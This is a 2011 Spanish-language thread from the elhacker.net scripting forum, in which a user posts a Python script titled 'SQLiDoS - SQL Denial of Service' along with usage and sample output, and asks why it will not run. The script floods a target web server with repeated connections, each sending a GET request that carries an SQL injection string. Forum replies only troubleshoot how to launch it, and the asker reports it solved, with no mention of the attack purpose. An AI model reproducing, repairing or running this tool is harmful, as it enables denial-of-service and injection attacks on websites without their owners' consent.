elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  No me funciona este programa de python
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: No me funciona este programa de python  (Leído 3,798 veces)
VanX
Wiki

Desconectado Desconectado

Mensajes: 222



Ver Perfil WWW
No me funciona este programa de python
« en: 8 Agosto 2011, 16:22 pm »

Hola a todos, buscando encontre este code pero no funciona....

Cuando lo ejecuto no pasa nada en el terminal sale asi:

>

y no hace mas.... espero que me puedan ayudar ;)

Código
  1. #!/usr/bin/python
  2. # SQLiDoS - SQL Denial of Service
  3.  
  4. import socket
  5. import sys
  6.  
  7. if len(sys.argv) != 4:
  8.    print "[+] Uso: SQLiDoS.py <Target Web> <SQLi Injection> <Connection Numbers>"
  9.    sys.exit(1)
  10.  
  11. def attack():
  12. connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  13. connection.connect((sys.argv[1], 80))
  14. print "[+] GET /" + sys.argv[2] + " HTTP/1.1"
  15. connection.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
  16. connection.send("Host: " + sys.argv[1]  + "\r\n\r\n");
  17. connection.close()
  18.  
  19. Host = sys.argv[1]
  20. SQLi = sys.argv[2]
  21. CoNum = int(sys.argv[3])
  22. print "[+] Connecting to %s" % (Host)
  23. print "[+] Injecting %s" % (SQLi)
  24. for i in range(1, CoNum+1):
  25. attack()

Como ejecutarlo:
Código
  1. SQLiDoS.py www.sitioweb.com index.php?id=' 10

Funciona:
Código
  1. [+] Connecting to www.sitioweb.com
  2. [+] Injecting index.php?id='
  3. [+] GET /noticias.php?id=' HTTP/1.1
  4. [+] GET /noticias.php?id=' HTTP/1.1
  5. [+] GET /noticias.php?id=' HTTP/1.1
  6. [+] GET /noticias.php?id=' HTTP/1.1
  7. [+] GET /noticias.php?id=' HTTP/1.1
  8. [+] GET /noticias.php?id=' HTTP/1.1
  9. [+] GET /noticias.php?id=' HTTP/1.1
  10. [+] GET /noticias.php?id=' HTTP/1.1
  11. [+] GET /noticias.php?id=' HTTP/1.1
  12. [+] GET /noticias.php?id=' HTTP/1.1

Les agradezco la ayuda de antemano!

saludos


En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: No me funciona este programa de python
« Respuesta #1 en: 8 Agosto 2011, 16:37 pm »

Estas abriendo la terminal de Python y debes de hacerlo desde ms-dos.

Saludos


En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
VanX
Wiki

Desconectado Desconectado

Mensajes: 222



Ver Perfil WWW
Re: No me funciona este programa de python
« Respuesta #2 en: 8 Agosto 2011, 16:44 pm »

Uso ubuntu y uso la terminal de este, no entiendo  :(
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: No me funciona este programa de python
« Respuesta #3 en: 8 Agosto 2011, 20:27 pm »

Pero te has movido hasta el directorio donde tienes el script y le has pasado el parametro correcto?

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
VanX
Wiki

Desconectado Desconectado

Mensajes: 222



Ver Perfil WWW
Re: No me funciona este programa de python
« Respuesta #4 en: 9 Agosto 2011, 13:37 pm »

solucionado ;)
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[python] Disenar este programa.
Scripting
Meta 6 6,865 Último mensaje 3 Octubre 2010, 14:44 pm
por criskapunk
No me funciona este programa
Java
Meta 8 5,653 Último mensaje 22 Abril 2011, 07:42 am
por Meta
¿porqué este programa símplemente no funciona?
Programación C/C++
Lotharsan 8 4,364 Último mensaje 19 Julio 2012, 18:45 pm
por rir3760
¿Por qué no funciona correctamente este programa? Ficheros inside
Programación C/C++
NathanD 5 2,925 Último mensaje 25 Febrero 2013, 22:58 pm
por NathanD
(Python 3.5) No comprendo porque no funciona mi programa
Scripting
BigKaz 1 1,669 Último mensaje 7 Diciembre 2016, 16:19 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines